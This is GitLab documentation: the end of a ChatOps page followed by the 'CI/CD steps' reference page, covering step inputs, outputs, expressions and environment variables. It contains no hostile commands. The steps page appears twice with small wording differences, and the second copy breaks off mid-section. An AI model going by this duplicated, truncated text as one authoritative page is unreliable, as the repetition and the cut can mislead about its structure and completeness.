  stage: chatops
  rules:
    - if: $CI_PIPELINE_SOURCE == "chat"
  script:
    - echo "This command will not be shown."
    - echo -e "section_start:$( date +%s ):chat_reply\r\033[0K\n$( ls -la )\nsection_end:$( date +%s ):chat_reply\r\033[0K"
```

## Trigger a CI/CD job using ChatOps

Prerequisites:

- You must have at least the Developer role for the project.
- The project is configured to use a slash command integration.

You can run a CI/CD job on the default branch from Slack or Mattermost. The slash command to trigger a CI/CD job depends on which slash command integration is configured for the project.
- For the GitLab for Slack app, use `/gitlab <project-name> run <job name> <arguments>`.
- For Slack or Mattermost slash commands, use `/<trigger-name> run <job name> <arguments>`.

Where:

- `<job name>` is the name of the CI/CD job to run.
- `<arguments>` are the arguments to pass to the CI/CD job.
- `<trigger-name>` is the trigger name configured for the Slack or Mattermost integration.

ChatOps schedules a pipeline that contains only the specified job.

## Related topics

- [A repository of common ChatOps scripts](https://gitlab.com/gitlab-com/chatops) that GitLab uses to interact with GitLab.com
- [GitLab for Slack app](../../user/project/integrations/gitlab_slack_application.md)
- [Slack slash commands](../../user/project/integrations/slack_slash_commands.md)
- [Mattermost slash commands](../../user/project/integrations/mattermost_slash_commands.md)
---
stage: Verify
group: Runner
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: CI/CD steps
breadcrumbs:
  - doc
  - ci
  - steps
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated
- Status: Experiment

{{< /details >}}

Steps are reusable units of a job that, when composed together, replace the `script` used in a GitLab CI/CD job. You are not required to use steps. However, the reusability, composability, testability, and independence of steps make it easier to understand and maintain CI/CD pipelines.

To get started, you can try the [Set up steps tutorial](../../tutorials/setup_steps/_index.md). To start creating your own steps, see [Creating your own step](#create-your-own-step). To understand how pipelines can benefit from using both CI/CD Components and CI/CD Steps, see [Combine CI/CD Components and CI/CD Steps](#combine-cicd-components-and-cicd-steps).

This experimental feature is still in active development and might have breaking changes at any time. Review the [changelog](https://gitlab.com/gitlab-org/step-runner/-/blob/main/CHANGELOG.md) for full details on any breaking changes.

{{< alert type="note" >}}

In GitLab Runner 17.11 and later, when you use the Docker executor, GitLab Runner injects the step-runner binary into the build container. For all other executors, ensure that the step-runner binary is in the execution environment. Support for the legacy Docker image `registry.gitlab.com/gitlab-org/step-runner:v0`, maintained by the step runner team, ends in GitLab 18.0.

{{< /alert >}}

## Step workflow

A step either runs a sequence of steps or executes a command. Each step specifies inputs and outputs, and has access to CI/CD job variables, environment variables, and resources such as the file system and networking.

Steps are hosted locally on the file system, in GitLab.com repositories, or in any other Git source.

Additionally, steps:

- Run in a Docker container created by the Steps team; you can review the [`Dockerfile`](https://gitlab.com/gitlab-org/step-runner/-/blob/main/Dockerfile).
  Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps will run inside the environment defined by the CI/CD job.
- Are specific to Linux. Follow [epic 15074](https://gitlab.com/groups/gitlab-org/-/epics/15074) to track when steps support multiple operating systems.

For example, this job uses the [`run`](../yaml/_index.md#run) CI/CD keyword to run a step:

```yaml
job:
  variables:
    CI_SAY_HI_TO: "Sally"
  run:
    - name: say_hi
      step: gitlab.com/gitlab-org/ci-cd/runner-tools/echo-step@v1.0.0
      inputs:
        message: "hello, ${{job.CI_SAY_HI_TO}}"
```

When this job runs, the message `hello, Sally` is printed to the job log. The definition of the echo step is:

```yaml
spec:
  inputs:
    message:
      type: string
---
exec:
  command:
    - bash
    - -c
    - echo '${{inputs.message}}'
```

## Use CI/CD Steps

Configure a GitLab CI/CD job to use CI/CD Steps with the `run` keyword. You cannot use `before_script`, `after_script`, or `script` in a job when you are running CI/CD Steps.

The `run` keyword accepts a list of steps to run. Steps are run one at a time in the order they are defined in the list. Each list item has a `name` and either `step`, `script`, or `action`. Names must consist only of alphanumeric characters and underscores, and must not start with a number.

### Run a step

Run a step by providing the [step location](#step-location) using the `step` keyword. Inputs and environment variables can be passed to the step, and these can contain expressions that interpolate values. Steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md).
For example, the echo step loaded from the Git repository `gitlab.com/components/echo` receives the environment variable `USER: Fred` and the input `message: hello Sally`:

```yaml
job:
  variables:
    CI_SAY_HI_TO: "Sally"
  run:
    - name: say_hi
      step: gitlab.com/components/echo@v1.0.0
      env:
        USER: "Fred"
      inputs:
        message: "hello ${{job.CI_SAY_HI_TO}}"
```

### Run a script

Run a script in a shell with the `script` keyword. Environment variables passed to scripts using `env` are set in the shell. Script steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md).

For example, the following script prints the GitLab user to the job log:

```yaml
my-job:
  run:
    - name: say_hi
      script: echo hello ${{job.GITLAB_USER_LOGIN}}
```

Script steps use the `bash` shell, falling back to `sh` if `bash` is not found.

### Run a GitHub action

Run GitHub actions with the `action` keyword. Inputs and environment variables are passed directly to the action, and action outputs are returned as step outputs. Action steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md).

Running actions requires the `dind` service. For more information, see [Use Docker to build Docker images](../docker/using_docker_build.md).

For example, the following step uses `action` to make `yq` available:

```yaml
my-job:
  run:
    - name: say_hi_again
      action: mikefarah/yq@master
      inputs:
        cmd: echo ["hi ${{job.GITLAB_USER_LOGIN}} again!"] | yq .[0]
```

#### Known issues

Actions running in GitLab do not support uploading artifacts directly. Artifacts must be written to the file system and cache instead, and selected with the existing [`artifacts` keyword](../yaml/_index.md#artifacts) and [`cache` keyword](../yaml/_index.md#cache).

### Step location

Steps are loaded from a relative path on the file system, GitLab.com repositories, or any other Git source.
#### Load a step from the file system

Load a step from the file system using a relative path that starts with a full-stop `.`. The folder referenced by the path must contain a `step.yml` step definition file. Path separators must always use forward-slashes `/`, regardless of operating system. For example:

```yaml
- name: my-step
  step: ./path/to/my-step
```

#### Load a step from a Git repository

Load a step from a Git repository by supplying the URL and revision (commit, branch, or tag) of the repository. You can also specify the relative directory and filename of the step in the `steps` folder of the repository. If the URL is specified without a directory, then `step.yml` is loaded from the `steps` folder.

For example:

- Specify the step with a branch:

  ```yaml
  job:
    run:
      - name: specifying_a_branch
        step: gitlab.com/components/echo@main
  ```

- Specify the step with a tag:

  ```yaml
  job:
    run:
      - name: specifying_a_tag
        step: gitlab.com/components/echo@v1.0.0
  ```

- Specify the step with a directory, filename, and Git commit in a repository:

  ```yaml
  job:
    run:
      - name: specifying_a_directory_file_and_commit_within_the_repository
        step: gitlab.com/components/echo/-/reverse/my-step.yml@3c63f399ace12061db4b8b9a29f522f41a3d7f25
  ```

To specify a folder or file outside the `steps` folder, use the expanded `step` syntax:

- Specify a directory and filename relative to the repository root:

  ```yaml
  job:
    run:
      - name: specifying_a_directory_outside_steps
        step:
          git:
            url: gitlab.com/components/echo
            rev: main
            dir: my-steps/sub-directory # optional, defaults to the repository root
            file: my-step.yml # optional, defaults to `step.yml`
  ```

### Expressions

Expressions are a mini-language enclosed in double curly-braces `${{ }}`.
Expressions are evaluated just prior to step execution in the job environment and can be used in:

- Input values
- Environment variable values
- Step location URL
- The executable command
- The executable work directory
- Outputs in a sequence of steps
- The `script` step
- The `action` step

Expressions can reference the following variables:

| Variable | Example | Description |
|:----------------------------|:--------------------------------------------------------------|:------------|
| `env` | `${{env.HOME}}` | Access environment variables set in the execution environment or in previous steps. |
| `export_file` | `echo '{"name":"NAME","value":"Fred"}' >${{export_file}}` | The path to the [export file](#export-an-environment-variable). Write to this file to export environment variables for use by subsequent running steps. |
| `inputs` | `${{inputs.message}}` | Access the step's inputs. |
| `job` | `${{job.GITLAB_USER_NAME}}` | Access GitLab CI/CD variables, limited to those starting with `CI_`, `DOCKER_`, or `GITLAB_`. |
| `output_file` | `echo '{"name":"meaning_life","value":42}' >${{output_file}}` | The path to the [output file](#return-an-output). Write to this file to set output variables from the step. |
| `step_dir` | `work_dir: ${{step_dir}}` | The directory where the step has been downloaded. Use to refer to files in the step, or to set the working directory of an executable step. |
| `steps.[step_name].outputs` | `${{steps.my_step.outputs.name}}` | Access [outputs](#specify-outputs) from previously executed steps. Choose the specific step using the step name. |
| `work_dir` | `${{work_dir}}` | The working directory of an executing step. |

Expressions are different from template interpolation, which uses double square-brackets (`$[[ ]]`) and is evaluated during job generation.

Expressions only have access to CI/CD job variables with names starting with `CI_`, `DOCKER_`, or `GITLAB_`.
Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps can access all CI/CD job variables.

### Using prior step outputs

Step inputs can reference outputs from prior steps by referencing the step name and output variable name. For example, if the `gitlab.com/components/random-string` step defined an output variable called `random_value`:

```yaml
job:
  run:
    - name: generate_rand
      step: gitlab.com/components/random-string
    - name: echo_random
      step: gitlab.com/components/echo
      inputs:
        message: "The random value is: ${{steps.generate_rand.outputs.random_value}}"
```

### Environment variables

Steps can [set](#set-environment-variables) and [export](#export-an-environment-variable) environment variables, and environment variables can be passed in when using `step`, `script`, or `action`.

Environment variables take precedence in the following order, from highest to lowest. Variables set:

1. By using the `env` keyword in the `step.yml`.
1. By using the `env` keyword passed to a step in a sequence of steps.
1. By using the `env` keyword for all steps in a sequence.
1. Where a previously run step has written to `${{export_file}}`.
1. By the runner.
1. By the container.

## Create your own step

Create your own step by performing the following tasks:

1. Create a GitLab project, a Git repository, or a directory on a file system that is accessible when the CI/CD job runs.
1. Create a `step.yml` file and place it in the root folder of the project, repository, or directory.
1. Define the [specification](#the-step-specification) for the step in the `step.yml`.
1. Define the [definition](#the-step-definition) for the step in the `step.yml`.
1. Add any files that your step uses to the project, repository, or directory.

After the step is created, you can [use the step in a job](#run-a-step).

### The step specification

The step specification is the first of two documents contained in the step `step.yml`.
The specification defines inputs and outputs that the step receives and returns.

#### Specify inputs

Input names can only use alphanumeric characters and underscores, and must not start with a number. Inputs must have a type, and they can optionally specify a default value. An input with no default value is a required input; it must be specified when using the step.

Inputs must be one of the following types:

| Type | Example | Description |
|:----------|:------------------------|:------------|
| `array` | `["a","b"]` | A list of un-typed items. |
| `boolean` | `true` | True or false. |
| `number` | `56.77` | 64 bit float. |
| `string` | `"brown cow"` | Text. |
| `struct` | `{"k1":"v1","k2":"v2"}` | Structured content. |

For example, to specify that the step accepts an optional input called `greeting` of type `string`:

```yaml
spec:
  inputs:
    greeting:
      type: string
      default: "hello, world"
---
```

To provide the input when using the step:

```yaml
run:
  - name: my_step
    step: ./my-step
    inputs:
      greeting: "hello, another world"
```

#### Specify outputs

Similar to inputs, output names can only use alphanumeric characters and underscores, and must not start with a number. Outputs must have a type, and they can optionally specify a default value. The default value is returned when the step doesn't return the output.

Outputs must be one of the following types:

| Type | Example | Description |
|:-------------|:------------------------|:------------|
| `array` | `["a","b"]` | A list of un-typed items. |
| `boolean` | `true` | True or false. |
| `number` | `56.77` | 64 bit float. |
| `string` | `"brown cow"` | Text. |
| `struct` | `{"k1":"v1","k2":"v2"}` | Structured content. |

For example, to specify that the step returns an output called `value` of type `number`:

```yaml
spec:
  outputs:
    value:
      type: number
---
```

To use the output when using the step:

```yaml
run:
  - name: random_generator
    step: ./random_gen
  - name: echo_number
    step: ./echo
    inputs:
      message: "Random number generated was ${{steps.random_generator.outputs.value}}"
```

#### Specify delegated outputs

Instead of specifying output names and types, outputs can be entirely delegated to a sub-step. The outputs returned by the sub-step are returned by your step. The `delegate` keyword in the step definition determines which sub-step outputs are returned by the step.

For example, the following step returns the outputs returned by the `random_generator` sub-step:

```yaml
spec:
  outputs: delegate
---
run:
  - name: random_generator
    step: ./random_gen
delegate: random_generator
```

#### Specify no inputs or outputs

A step might not require any inputs or return any outputs. This could be when a step only writes to disk, sets an environment variable, or prints to STDOUT. In this case, `spec:` is empty:

```yaml
spec:
---
```

### The step definition

Steps can:

- Set environment variables
- Execute a command
- Run a sequence of other steps

#### Set environment variables

Set environment variables by using the `env` keyword. Environment variable names can only use alphanumeric characters and underscores, and must not start with a number. Environment variables are made available either to the executable command or to all of the steps if running a sequence of steps. For example:

```yaml
spec:
---
env:
  FIRST_NAME: Sally
  LAST_NAME: Seashells
run: # omitted for brevity
```

Steps only have access to a subset of environment variables from the runner environment. Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps can access all environment variables.

#### Execute a command

A step declares it executes a command by using the `exec` keyword.
The command must be specified, but the working directory (`work_dir`) is optional. Environment variables set by the step are available to the running process.

For example, the following step prints the step directory to the job log:

```yaml
spec:
---
exec:
  work_dir: ${{step_dir}}
  command:
    - bash
    - -c
    - "echo ${PWD}"
```

{{< alert type="note" >}}

Any dependency required by the executing step should also be installed by the step. For example, if a step calls `go`, it should first install it.

{{< /alert >}}

##### Return an output

Executable steps return an output by adding a line to the `${{output_file}}` in JSON Line format. Each line is a JSON object with `name` and `value` key pairs. The `name` must be a string, and the `value` must be a type that matches the output type in the step specification:

| Step specification type | Expected JSONL value type |
|:------------------------|:--------------------------|
| `array` | `array` |
| `boolean` | `boolean` |
| `number` | `number` |
| `string` | `string` |
| `struct` | `object` |

For example, to return the output named `car` with `string` value `Range Rover`:

```yaml
spec:
  outputs:
    car:
      type: string
---
exec:
  command:
    - bash
    - -c
    - echo '{"name":"car","value":"Range Rover"}' >${{output_file}}
```

##### Export an environment variable

Executable steps export an environment variable by adding a line to the `${{export_file}}` in JSON Line format. Each line is a JSON object with `name` and `value` key pairs. Both `name` and `value` must be strings.

For example, to set the variable `GOPATH` to value `/go`:

```yaml
spec:
---
exec:
  command:
    - bash
    - -c
    - echo '{"name":"GOPATH","value":"/go"}' >${{export_file}}
```

#### Run a sequence of steps

A step declares it runs a sequence of steps using the `steps` keyword. Steps run one at a time in the order they are defined in the list. This syntax is the same as the `run` keyword.
Steps must have a name consisting only of alphanumeric characters and underscores, and must not start with a number.

For example, this step installs Go, then runs a second step that expects Go to already have been installed:

```yaml
spec:
---
run:
  - name: install_go
    step: ./go-steps/install-go
    inputs:
      version: "1.22"
  - name: format_go_code
    step: ./go-steps/go-fmt
    inputs:
      code: path/to/go-code
```

##### Return an output

Outputs are returned from a sequence of steps by using the `outputs` keyword. The type of value in the output must match the type of the output in the step specification.

For example, the following step returns the installed Java version as an output. This assumes the `install_java` step returns an output named `java_version`.

```yaml
spec:
  outputs:
    java_version:
      type: string
---
run:
  - name: install_java
    step: ./common/install-java
outputs:
  java_version: "the java version is ${{steps.install_java.outputs.java_version}}"
```

Alternatively, all outputs of a sub-step can be returned using the `delegate` keyword. For example:

```yaml
spec:
  outputs: delegate
---
run:
  - name: install_java
    step: ./common/install-java
delegate: install_java
```

## Combine CI/CD Components and CI/CD Steps

[CI/CD components](../components/_index.md) are reusable single pipeline configuration units. They are included in a pipeline when it is created, adding jobs and configuration to the pipeline. Files such as common scripts or programs from the component project cannot be referenced from a CI/CD job.

CI/CD Steps are reusable units of a job. When the job runs, the referenced step is downloaded to the execution environment or image, bringing along any extra files included with the step. Execution of the step replaces the `script` in the job.

Components and steps work well together to create solutions for CI/CD pipelines. Steps handle the complexity of how jobs are composed, and automatically retrieve the files necessary to run the job.
Components provide a method to import job configuration, but hide the underlying job composition from the user.

Steps and components use different syntax for expressions to help differentiate the expression types. Component expressions use square brackets `$[[ ]]` and are evaluated during pipeline creation. Step expressions use braces `${{ }}` and are evaluated during job execution, just before executing the step.

For example, a project could use a component that adds a job to format Go code:

- In the project's `.gitlab-ci.yml` file:

  ```yaml
  include:
    - component: gitlab.com/my-components/go@main
      inputs:
        fmt_packages: "./..."
  ```

- Internally, the component uses CI/CD steps to compose the job, which installs Go then runs the formatter. In the component's `templates/go.yml` file:

  ```yaml
  spec:
    inputs:
      fmt_packages:
        description: The Go packages that will be formatted using the Go formatter.
      go_version:
        default: "1.22"
        description: The version of Go to install before running go fmt.
  ---
  format code:
    run:
      - name: install_go
        step: ./languages/go/install
        inputs:
          version: $[[ inputs.go_version ]] # version set to the value of the component input go_version
      - name: format_code
        step: ./languages/go/go-fmt
        inputs:
          go_binary: ${{ steps.install_go.outputs.go_binary }} # go_binary set to the value of the go_binary output from the previous step
          fmt_packages: $[[ inputs.fmt_packages ]] # fmt_packages set to the value of the component input fmt_packages
  ```

In this example, the CI/CD component hides the complexity of the steps from the component author.

## Troubleshooting

### Fetching steps from an HTTPS URL

An error message such as `tls: failed to verify certificate: x509: certificate signed by unknown authority` indicates that the operating system does not recognize or trust the server hosting the step. A common cause is when steps are run in a job with a Docker image that doesn't have any trusted root certificates installed.
Resolve the issue by installing certificates in the container or by baking them into the job `image`. You can use a `script` step to install dependencies in the container before fetching any steps. For example:

```yaml
ubuntu_job:
  image: ubuntu:24.04
  run:
    - name: install_certs # Install trusted certificates first
      script: apt update && apt install --assume-yes --no-install-recommends ca-certificates
    - name: echo_step # With trusted certificates, use HTTPS without errors
      step: https://gitlab.com/user/my_steps/hello_world@main
```
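To recap the pieces above, here is a minimal end-to-end sketch of a local step and a job that runs it. The directory path, step name, input, and greeting are illustrative assumptions, not official examples:

```yaml
# ./steps/greet/step.yml — hypothetical local step definition.
# First document: the specification (one optional string input).
spec:
  inputs:
    name:
      type: string
      default: "world"
---
# Second document: the definition (an executable command).
exec:
  command:
    - bash
    - -c
    - echo "hello, ${{inputs.name}}"
```

```yaml
# .gitlab-ci.yml — a job that loads the step from the file system
# and passes a job variable as its input.
greet:
  run:
    - name: say_hello
      step: ./steps/greet
      inputs:
        name: "${{job.GITLAB_USER_LOGIN}}"
```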
--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: CI/CD steps breadcrumbs: - doc - ci - steps --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated - Status: Experiment {{< /details >}} Steps are reusable units of a job that when composed together replace the `script` used in a GitLab CI/CD job. You are not required to use steps. However, the reusability, composability, testability, and independence of steps make it easier to understand and maintain CI/CD pipeline. To get started, you can try the [Set up steps tutorial](../../tutorials/setup_steps/_index.md). To start creating your own steps, see [Creating your own step](#create-your-own-step). To understand how pipelines can benefit from using both CI/CD Components and CI/CD Steps, see [Combine CI/CD Components and CI/CD Steps](#combine-cicd-components-and-cicd-steps). This experimental feature is still in active development and might have breaking changes at any time. Review the [changelog](https://gitlab.com/gitlab-org/step-runner/-/blob/main/CHANGELOG.md) for full details on any breaking changes. {{< alert type="note" >}} In GitLab Runner 17.11 and later, when you use the Docker executor, GitLab Runner injects the step-runner binary into the build container. For all other executors, ensure that the step-runner binary is in the execution environment. Support for the legacy Docker image `registry.gitlab.com/gitlab-org/step-runner:v0`, maintained by the step runner team, ends in GitLab 18.0. {{< /alert >}} ## Step workflow A step either runs a sequence of steps or executes a command. Each step specifies inputs and outputs, and has access to CI/CD job variables, environment variables, and resources such as the file system and networking. 
Steps are hosted locally on the file system, in GitLab.com repositories, or in any other Git source. Additionally, steps: - Run in a Docker container created by the Steps team, you can review the [`Dockerfile`](https://gitlab.com/gitlab-org/step-runner/-/blob/main/Dockerfile). Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps will run inside the environment defined by the CI/CD job. - Are specific to Linux. Follow [epic 15074](https://gitlab.com/groups/gitlab-org/-/epics/15074) to track when steps supports multiple operating systems. For example, this job uses the [`run`](../yaml/_index.md#run) CI/CD keyword to run a step: ```yaml job: variables: CI_SAY_HI_TO: "Sally" run: - name: say_hi step: gitlab.com/gitlab-org/ci-cd/runner-tools/echo-step@v1.0.0 inputs: message: "hello, ${{job.CI_SAY_HI_TO}}" ``` When this job runs, the message `hello, Sally` is printed to job log. The definition of the echo step is: ```yaml spec: inputs: message: type: string --- exec: command: - bash - -c - echo '${{inputs.message}}' ``` ## Use CI/CD Steps Configure a GitLab CI/CD job to use CI Steps with the `run` keyword. You cannot use `before_script`, `after_script`, or `script` in a job when you are running CI/CD Steps. The `run` keyword accepts a list of steps to run. Steps are run one at a time in the order they are defined in the list. Each list item has a `name` and either `step`, `script`, or `action`. Name must consist only of alphanumeric characters and underscores, and must not start with a number. ### Run a step Run a step by providing the [step location](#step-location) using the `step` keyword. Inputs and environment variables can be passed to the step, and these can contain expressions that interpolate values. Steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). 
For example, the echo step loaded from the Git repository `gitlab.com/components/echo` receives the environment variable `USER: Fred` and the input `message: hello Sally`: ```yaml job: variables: CI_SAY_HI_TO: "Sally" run: - name: say_hi step: gitlab.com/components/echo@v1.0.0 env: USER: "Fred" inputs: message: "hello ${{job.CI_SAY_HI_TO}}" ``` ### Run a script Run a script in a shell with the `script` keyword. Environment variables passed to scripts using `env` are set in the shell. Script steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). For example, the following script prints the GitLab user to the job log: ```yaml my-job: run: - name: say_hi script: echo hello ${{job.GITLAB_USER_LOGIN}} ``` Script steps use the `bash` shell, falling back to use `sh` if bash is not found. ### Run a GitHub action Run GitHub actions with the `action` keyword. Inputs and environment variables are passed directly to the action, and action outputs are returned as step outputs. Action steps run in the directory defined by the `CI_PROJECT_DIR` [predefined variable](../variables/predefined_variables.md). Running actions requires the `dind` service. For more information, see [Use Docker to build Docker images](../docker/using_docker_build.md). For example, the following step uses `action` to make `yq` available: ```yaml my-job: run: - name: say_hi_again action: mikefarah/yq@master inputs: cmd: echo ["hi ${{job.GITLAB_USER_LOGIN}} again!"] | yq .[0] ``` #### Known issues Actions running in GitLab do not support uploading artifacts directly. Artifacts must be written to the file system and cache instead, and selected with the existing [`artifacts` keyword](../yaml/_index.md#artifacts) and [`cache` keyword](../yaml/_index.md#cache). ### Step location Steps are loaded from a relative path on the file system, GitLab.com repositories, or any other Git source. 
#### Load a step from the file system

Load a step from the file system using a relative path that starts with a full-stop `.`. The folder referenced by the path must contain a `step.yml` step definition file. Path separators must always use forward-slashes `/`, regardless of operating system.

For example:

```yaml
- name: my-step
  step: ./path/to/my-step
```

#### Load a step from a Git repository

Load a step from a Git repository by supplying the URL and revision (commit, branch, or tag) of the repository. You can also specify the relative directory and filename of the step in the `steps` folder of the repository. If the URL is specified without a directory, then `step.yml` is loaded from the `steps` folder.

For example:

- Specify the step with a branch:

  ```yaml
  job:
    run:
      - name: specifying_a_branch
        step: gitlab.com/components/echo@main
  ```

- Specify the step with a tag:

  ```yaml
  job:
    run:
      - name: specifying_a_tag
        step: gitlab.com/components/echo@v1.0.0
  ```

- Specify the step with a directory, filename, and Git commit in a repository:

  ```yaml
  job:
    run:
      - name: specifying_a_directory_file_and_commit_within_the_repository
        step: gitlab.com/components/echo/-/reverse/my-step.yml@3c63f399ace12061db4b8b9a29f522f41a3d7f25
  ```

To specify a folder or file outside the `steps` folder, use the expanded `step` syntax:

- Specify a directory and filename relative to the repository root.

  ```yaml
  job:
    run:
      - name: specifying_a_directory_outside_steps
        step:
          git:
            url: gitlab.com/components/echo
            rev: main
            dir: my-steps/sub-directory # optional, defaults to the repository root
            file: my-step.yml # optional, defaults to `step.yml`
  ```

### Expressions

Expressions are a mini-language enclosed in double curly-braces `${{ }}`.
Expressions are evaluated just prior to step execution in the job environment and can be used in:

- Input values
- Environment variable values
- Step location URL
- The executable command
- The executable work directory
- Outputs in a sequence of steps
- The `script` step
- The `action` step

Expressions can reference the following variables:

| Variable | Example | Description |
|:----------------------------|:--------------------------------------------------------------|:------------|
| `env` | `${{env.HOME}}` | Access environment variables set in the execution environment or in previous steps. |
| `export_file` | `echo '{"name":"NAME","value":"Fred"}' >${{export_file}}` | The path to the [export file](#export-an-environment-variable). Write to this file to export environment variables for use by subsequent running steps. |
| `inputs` | `${{inputs.message}}` | Access the step's inputs. |
| `job` | `${{job.GITLAB_USER_NAME}}` | Access GitLab CI/CD variables, limited to those starting with `CI_`, `DOCKER_` or `GITLAB_`. |
| `output_file` | `echo '{"name":"meaning_life","value":42}' >${{output_file}}` | The path to the [output file](#return-an-output). Write to this file to set output variables from the step. |
| `step_dir` | `work_dir: ${{step_dir}}` | The directory where the step has been downloaded. Use to refer to files in the step, or to set the working directory of an executable step. |
| `steps.[step_name].outputs` | `${{steps.my_step.outputs.name}}` | Access [outputs](#specify-outputs) from previously executed steps. Choose the specific step using the step name. |
| `work_dir` | `${{work_dir}}` | The working directory of an executing step. |

Expressions are different from template interpolation, which uses double square-brackets (`$[[ ]]`) and is evaluated during job generation.

Expressions only have access to CI/CD job variables with names starting with `CI_`, `DOCKER_`, or `GITLAB_`.
Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps can access all CI/CD job variables.

### Using prior step outputs

Step inputs can reference outputs from prior steps by referencing the step name and output variable name. For example, if the `gitlab.com/components/random-string` step defined an output variable called `random_value`:

```yaml
job:
  run:
    - name: generate_rand
      step: gitlab.com/components/random-string@main
    - name: echo_random
      step: gitlab.com/components/echo@main
      inputs:
        message: "The random value is: ${{steps.generate_rand.outputs.random_value}}"
```

### Environment variables

Steps can [set](#set-environment-variables) and [export](#export-an-environment-variable) environment variables, and environment variables can be passed to steps when using `step`, `script`, or `action`.

Environment variables take the following precedence, from highest to lowest. Variables set:

1. By using the `env` keyword in the `step.yml`.
1. By using the `env` keyword passed to a step in a sequence of steps.
1. By using the `env` keyword for all steps in a sequence.
1. Where a previously run step has written to `${{export_file}}`.
1. By the runner.
1. By the container.

## Create your own step

Create your own step by performing the following tasks:

1. Create a GitLab project, a Git repository, or a directory on a file system that is accessible when the CI/CD job runs.
1. Create a `step.yml` file and place it in the root folder of the project, repository, or directory.
1. Define the [specification](#the-step-specification) for the step in the `step.yml`.
1. Define the [definition](#the-step-definition) for the step in the `step.yml`.
1. Add any files that your step uses to the project, repository, or directory.

After the step is created, you can [use the step in a job](#run-a-step).

### The step specification

The step specification is the first of two documents contained in the step `step.yml`.
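For example, a minimal `step.yml` contains the specification document followed by the definition document, separated by `---`. This sketch takes no inputs and echoes a fixed, illustrative message:

```yaml
# step.yml
spec:        # first document: the step specification (empty here)
---
exec:        # second document: the step definition
  command:
    - bash
    - -c
    - echo 'hello from a minimal step'
```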
The specification defines inputs and outputs that the step receives and returns.

#### Specify inputs

Input names can only use alphanumeric characters and underscores, and must not start with a number. Inputs must have a type, and they can optionally specify a default value. An input with no default value is a required input; it must be specified when using the step.

Inputs must be one of the following types.

| Type | Example | Description |
|:----------|:------------------------|:------------|
| `array` | `["a","b"]` | A list of un-typed items. |
| `boolean` | `true` | True or false. |
| `number` | `56.77` | 64-bit float. |
| `string` | `"brown cow"` | Text. |
| `struct` | `{"k1":"v1","k2":"v2"}` | Structured content. |

For example, to specify that the step accepts an optional input called `greeting` of type `string`:

```yaml
spec:
  inputs:
    greeting:
      type: string
      default: "hello, world"
---
```

To provide the input when using the step:

```yaml
run:
  - name: my_step
    step: ./my-step
    inputs:
      greeting: "hello, another world"
```

#### Specify outputs

Similar to inputs, output names can only use alphanumeric characters and underscores, and must not start with a number. Outputs must have a type, and they can optionally specify a default value. The default value is returned when the step doesn't return the output.

Outputs must be one of the following types.

| Type | Example | Description |
|:-------------|:------------------------|:------------|
| `array` | `["a","b"]` | A list of un-typed items. |
| `boolean` | `true` | True or false. |
| `number` | `56.77` | 64-bit float. |
| `string` | `"brown cow"` | Text. |
| `struct` | `{"k1":"v1","k2":"v2"}` | Structured content.
|

For example, to specify that the step returns an output called `value` of type `number`:

```yaml
spec:
  outputs:
    value:
      type: number
---
```

To use the output when using the step:

```yaml
run:
  - name: random_generator
    step: ./random_gen
  - name: echo_number
    step: ./echo
    inputs:
      message: "Random number generated was ${{steps.random_generator.outputs.value}}"
```

#### Specify delegated outputs

Instead of specifying output names and types, outputs can be entirely delegated to a sub-step. The outputs returned by the sub-step are returned by your step. The `delegate` keyword in the step definition determines which sub-step outputs are returned by the step.

For example, the following step returns the outputs returned by the `random_generator` step.

```yaml
spec:
  outputs: delegate
---
run:
  - name: random_generator
    step: ./random_gen
delegate: random_generator
```

#### Specify no inputs or outputs

A step might not require any inputs or return any outputs. This could be when a step only writes to disk, sets an environment variable, or prints to STDOUT. In this case, `spec:` is empty:

```yaml
spec:
---
```

### The step definition

Steps can:

- Set environment variables.
- Execute a command.
- Run a sequence of other steps.

#### Set environment variables

Set environment variables by using the `env` keyword. Environment variable names can only use alphanumeric characters and underscores, and must not start with a number. Environment variables are made available either to the executable command or to all of the steps if running a sequence of steps.

For example:

```yaml
spec:
---
env:
  FIRST_NAME: Sally
  LAST_NAME: Seashells
run:
  # omitted for brevity
```

Steps only have access to a subset of environment variables from the runner environment. Follow [epic 15073](https://gitlab.com/groups/gitlab-org/-/epics/15073) to track when steps can access all environment variables.

#### Execute a command

A step declares it executes a command by using the `exec` keyword.
The command must be specified, but the working directory (`work_dir`) is optional. Environment variables set by the step are available to the running process.

For example, the following step prints the step directory to the job log:

```yaml
spec:
---
exec:
  work_dir: ${{step_dir}}
  command:
    - bash
    - -c
    - "echo ${PWD}"
```

{{< alert type="note" >}}

Any dependency required by the executing step should also be installed by the step. For example, if a step calls `go`, it should first install it.

{{< /alert >}}

##### Return an output

Executable steps return an output by adding a line to the `${{output_file}}` in JSON Lines format. Each line is a JSON object with `name` and `value` key pairs. The `name` must be a string, and the `value` must be a type that matches the output type in the step specification:

| Step specification type | Expected JSONL value type |
|:------------------------|:--------------------------|
| `array` | `array` |
| `boolean` | `boolean` |
| `number` | `number` |
| `string` | `string` |
| `struct` | `object` |

For example, to return the output named `car` with `string` value `Range Rover`:

```yaml
spec:
  outputs:
    car:
      type: string
---
exec:
  command:
    - bash
    - -c
    - echo '{"name":"car","value":"Range Rover"}' >${{output_file}}
```

##### Export an environment variable

